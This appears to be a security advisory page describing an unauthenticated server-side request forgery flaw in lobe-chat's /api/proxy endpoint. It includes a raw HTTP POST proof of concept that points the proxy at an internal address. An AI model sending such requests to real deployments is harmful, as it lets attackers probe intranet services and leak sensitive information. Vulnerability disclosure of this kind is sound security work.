lobe-chat `/api/proxy` endpoint Server-Side Request Forgery vulnerability

Summary

The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

Details

visit https://chat-preview.lobehub.com/settings/agent
you can attack all internal services by /api/proxy and get the echo in http response :)

PoC

POST /api/proxy HTTP/2
Host: xxxxxxxxxxxxxxxxx
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346846.0.0.0
Content-Length: 23
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/agent
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7

http://172.23.0.1:8000/

Impact

SSRF ,All users will be impacted.

References

arvinxx published to lobehub/lobe-chat May 10, 2024

Published to the GitHub Advisory Database May 10, 2024

Reviewed May 10, 2024

Published by the National Vulnerability Database May 14, 2024

Last updated May 14, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code

Credits